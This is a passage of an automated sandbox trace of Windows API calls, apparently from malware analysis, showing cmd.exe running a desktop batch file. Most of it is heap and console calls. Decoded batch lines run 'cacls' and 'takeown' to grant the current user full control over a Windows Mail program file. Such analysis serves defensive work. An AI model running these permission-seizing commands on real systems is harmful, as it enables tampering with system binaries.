returned -68 [0205.074] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0205.074] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0205.074] GetProcessHeap () returned 0x860000 [0205.074] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x210) returned 0x8731e0 [0205.074] GetProcessHeap () returned 0x860000 [0205.074] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xc6) returned 0x8733f8 [0205.077] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0205.077] GetProcessHeap () returned 0x860000 [0205.077] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x418) returned 0x8607f0 [0205.077] SetErrorMode (uMode=0x0) returned 0x0 [0205.077] SetErrorMode (uMode=0x1) returned 0x0 [0205.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x8607f8, lpFilePart=0x45ef40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x45ef40*="Desktop") returned 0x25 [0205.077] SetErrorMode (uMode=0x0) returned 0x1 [0205.077] GetProcessHeap () returned 0x860000 [0205.078] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x8607f0, Size=0x6e) returned 0x8607f0 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x8607f0) returned 0x6e [0205.078] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x5a) returned 0x8734c8 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xa8) returned 0x873530 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x873530, Size=0x5a) returned 0x873530 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x873530) returned 0x5a [0205.078] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.078] GetProcessHeap () returned 0x860000 [0205.078] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xe0) returned 0x873598 [0205.083] GetProcessHeap () returned 0x860000 [0205.083] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x873598, Size=0x76) returned 0x873598 [0205.083] GetProcessHeap () returned 0x860000 [0205.084] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x873598) returned 0x76 [0205.084] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.084] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x45ecdc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45ecdc) returned 0x873618 [0205.084] GetProcessHeap () returned 0x860000 [0205.084] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x14) returned 0x873658 [0205.084] FindClose (in: hFindFile=0x873618 | out: hFindFile=0x873618) returned 1 [0205.084] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0205.084] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0205.084] GetConsoleTitleW (in: lpConsoleTitle=0x45f1b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.278] GetProcessHeap () returned 0x860000 [0205.278] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x11c) returned 0x860868 [0205.278] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0205.279] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0205.279] IdentifyCodeAuthzLevelW () returned 0x1 [0205.286] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0205.286] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0205.287] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0205.287] CloseCodeAuthzLevel () returned 0x1 [0205.287] SetErrorMode (uMode=0x0) returned 0x0 [0205.287] SetErrorMode (uMode=0x1) returned 0x0 [0205.287] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x8731e8, lpFilePart=0x45f0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x45f0a0*="Ch81ANBE.bat") returned 0x32 [0205.287] SetErrorMode (uMode=0x0) returned 0x1 [0205.287] GetProcessHeap () returned 0x860000 [0205.287] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x72) returned 0x882b88 [0205.287] wcsspn (_String=" \"C:\\Program Files\\Windows Mail\\told.exe\"", _Control=" \x09") returned 0x1 [0205.287] GetProcessHeap () returned 0x860000 [0205.287] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x5a) returned 0x8610c0 [0205.287] GetProcessHeap () returned 0x860000 [0205.287] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xac) returned 0x861128 [0205.287] GetProcessHeap () returned 0x860000 [0205.287] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x861128, Size=0x5c) returned 0x861128 [0205.287] GetProcessHeap () returned 0x860000 [0205.287] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x861128) returned 0x5c [0205.287] CmdBatNotification () returned 0x87324a [0205.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0205.288] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0205.288] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.289] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.289] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.289] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.289] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0xe2, lpOverlapped=0x0) returned 1 [0205.291] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0205.291] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0205.292] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.292] GetFileType (hFile=0x78) returned 0x1 [0205.292] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.292] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0205.292] GetProcessHeap () returned 0x860000 [0205.292] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x876ab8 [0205.292] GetProcessHeap () returned 0x860000 [0205.292] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x4008) returned 0x884af0 [0205.293] GetProcessHeap () returned 0x860000 [0205.293] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x1a) returned 0x875808 [0205.293] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0205.293] GetProcessHeap () returned 0x860000 [0205.293] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875808 | out: hHeap=0x860000) returned 1 [0205.293] GetProcessHeap () returned 0x860000 [0205.293] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0205.293] GetProcessHeap () returned 0x860000 [0205.293] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ab8 | out: hHeap=0x860000) returned 1 [0205.294] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0205.294] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0205.294] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0205.294] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0205.294] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0205.294] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0205.294] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0205.294] GetProcessHeap () returned 0x860000 [0205.294] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x58) returned 0x861190 [0205.294] GetProcessHeap () returned 0x860000 [0205.294] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x14) returned 0x8611f0 [0205.298] GetProcessHeap () returned 0x860000 [0205.298] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x9c) returned 0x861210 [0205.299] _tell (_FileHandle=3) returned 32 [0205.300] _close (_FileHandle=3) returned 0 [0205.300] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ee9c | out: _Buffer="\r\n") returned 2 [0205.300] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.300] GetFileType (hFile=0x7) returned 0x2 [0205.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.301] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee5c | out: lpMode=0x45ee5c) returned 1 [0205.301] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.301] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45ee88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45ee88*=0x2) returned 1 [0205.301] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0205.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0205.301] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x45ee98 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0205.302] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x45ee98 | out: _Buffer=">") returned 1 [0205.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.302] GetFileType (hFile=0x7) returned 0x2 [0205.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.302] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee60 | out: lpMode=0x45ee60) returned 1 [0205.302] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.302] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x45ee8c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x45ee8c*=0x26) returned 1 [0205.303] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.303] GetFileType (hFile=0x7) returned 0x2 [0205.303] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.303] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0e4 | out: lpMode=0x45f0e4) returned 1 [0205.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.304] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8611f8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x45f110, lpReserved=0x0 | out: lpBuffer=0x8611f8*, lpNumberOfCharsWritten=0x45f110*=0x5) returned 1 [0205.304] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x45f11c | out: _Buffer=" \"C:\\Program Files\\Windows Mail\\told.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 74 [0205.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.304] GetFileType (hFile=0x7) returned 0x2 [0205.304] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.304] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0dc | out: lpMode=0x45f0dc) returned 1 [0205.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.305] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0x45f108, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f108*=0x4a) returned 1 [0205.305] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45f13c | out: _Buffer="\r\n") returned 2 [0205.305] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.305] GetFileType (hFile=0x7) returned 0x2 [0205.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.306] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45f0fc | out: lpMode=0x45f0fc) returned 1 [0205.306] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.306] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x45f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x45f128*=0x2) returned 1 [0205.307] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0205.307] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0205.307] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0205.307] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0205.307] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0205.307] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0205.307] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0205.307] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0205.307] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0205.307] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0205.307] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0205.307] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0205.307] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0205.307] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0205.307] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0205.308] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0205.308] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0205.308] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0205.308] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0205.308] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0205.308] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0205.308] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0205.308] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0205.308] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0205.308] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0205.308] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0205.308] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0205.308] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0205.308] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0205.308] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0205.308] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0205.309] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0205.309] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0205.309] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0205.309] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0205.309] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0205.309] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0205.309] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0205.309] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0205.309] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0205.309] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0205.309] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0205.310] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0205.310] GetProcessHeap () returned 0x860000 [0205.310] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x418) returned 0x874158 [0205.310] SetErrorMode (uMode=0x0) returned 0x0 [0205.310] SetErrorMode (uMode=0x1) returned 0x0 [0205.310] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x874160, lpFilePart=0x45eee0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x45eee0*="Desktop") returned 0x25 [0205.310] SetErrorMode (uMode=0x0) returned 0x1 [0205.311] GetProcessHeap () returned 0x860000 [0205.311] RtlReAllocateHeap (Heap=0x860000, Flags=0x0, Ptr=0x874158, Size=0x60) returned 0x874158 [0205.311] GetProcessHeap () returned 0x860000 [0205.311] RtlSizeHeap (HeapHandle=0x860000, Flags=0x0, MemoryPointer=0x874158) returned 0x60 [0205.311] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.311] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.311] GetProcessHeap () returned 0x860000 [0205.311] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x120) returned 0x8741c0 [0205.311] GetProcessHeap () returned 0x860000 [0205.311] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x238) returned 0x8742e8 [0205.316] GetConsoleTitleW (in: lpConsoleTitle=0x45ecac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.966] GetConsoleTitleW (in: lpConsoleTitle=0x45ea40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.966] InitializeProcThreadAttributeList (in: lpAttributeList=0x45e8c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45e990 | out: lpAttributeList=0x45e8c8, lpSize=0x45e990) returned 1 [0205.966] UpdateProcThreadAttribute (in: lpAttributeList=0x45e8c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x45e988, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45e8c8, lpPreviousValue=0x0) returned 1 [0205.967] GetStartupInfoW (in: lpStartupInfo=0x45e884 | out: lpStartupInfo=0x45e884*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0205.985] CloseHandle (hObject=0x78) returned 1 [0205.985] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.986] GetProcessHeap () returned 0x860000 [0205.986] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0205.986] GetEnvironmentStringsW () returned 0x874be8* [0205.986] GetProcessHeap () returned 0x860000 [0205.986] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb36) returned 0x875f78 [0205.986] FreeEnvironmentStringsW (penv=0x874be8) returned 1 [0205.986] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0220.050] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x45e864 | out: lpExitCode=0x45e864*=0x1f57) returned 1 [0220.051] CloseHandle (hObject=0x74) returned 1 [0220.051] _vsnwprintf (in: _Buffer=0x45e9ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x45e870 | out: _Buffer="00001F57") returned 8 [0220.051] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0220.051] GetProcessHeap () returned 0x860000 [0220.051] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x875f78 | out: hHeap=0x860000) returned 1 [0220.051] GetEnvironmentStringsW () returned 0x875f78* [0220.051] GetProcessHeap () returned 0x860000 [0220.051] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb5c) returned 0x876ae0 [0220.052] FreeEnvironmentStringsW (penv=0x875f78) returned 1 [0220.052] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.052] GetProcessHeap () returned 0x860000 [0220.052] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ae0 | out: hHeap=0x860000) returned 1 [0220.052] GetEnvironmentStringsW () returned 0x875f78* [0220.052] GetProcessHeap () returned 0x860000 [0220.052] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb5c) returned 0x876ae0 [0220.052] FreeEnvironmentStringsW (penv=0x875f78) returned 1 [0220.052] GetProcessHeap () returned 0x860000 [0220.052] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x860d38 | out: hHeap=0x860000) returned 1 [0220.052] DeleteProcThreadAttributeList (in: lpAttributeList=0x45e8c8 | out: lpAttributeList=0x45e8c8) [0220.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.053] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0220.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.053] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0220.054] SetConsoleInputExeNameW () returned 0x1 [0220.054] GetConsoleOutputCP () returned 0x1b5 [0220.054] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0220.054] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x45f0e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0220.055] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0220.055] _get_osfhandle (_FileHandle=3) returned 0x74 [0220.055] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.055] GetProcessHeap () returned 0x860000 [0220.055] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874a20 | out: hHeap=0x860000) returned 1 [0220.055] GetProcessHeap () returned 0x860000 [0220.055] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8748f0 | out: hHeap=0x860000) returned 1 [0220.055] GetProcessHeap () returned 0x860000 [0220.055] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8747c8 | out: hHeap=0x860000) returned 1 [0220.055] GetProcessHeap () returned 0x860000 [0220.055] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874760 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8746b0 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874498 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874418 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8742e8 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8741c0 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874158 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861210 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8611f0 | out: hHeap=0x860000) returned 1 [0220.056] GetProcessHeap () returned 0x860000 [0220.056] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x861190 | out: hHeap=0x860000) returned 1 [0220.057] _get_osfhandle (_FileHandle=3) returned 0x74 [0220.057] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.057] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x45f0c8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x45f0c8*=0xc2, lpOverlapped=0x0) returned 1 [0220.057] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.057] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0220.058] _get_osfhandle (_FileHandle=3) returned 0x74 [0220.058] GetFileType (hFile=0x74) returned 0x1 [0220.058] _get_osfhandle (_FileHandle=3) returned 0x74 [0220.058] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.058] GetProcessHeap () returned 0x860000 [0220.058] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x884af0 [0220.058] GetProcessHeap () returned 0x860000 [0220.058] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x884af0 | out: hHeap=0x860000) returned 1 [0220.060] GetProcessHeap () returned 0x860000 [0220.060] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x62) returned 0x8611f0 [0220.062] _tell (_FileHandle=3) returned 47 [0220.062] _close (_FileHandle=3) returned 0 [0220.062] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x45ee9c | out: _Buffer="\r\n") returned 2 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] GetFileType (hFile=0x7) returned 0x2 [0220.063] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x45ee5c | out: 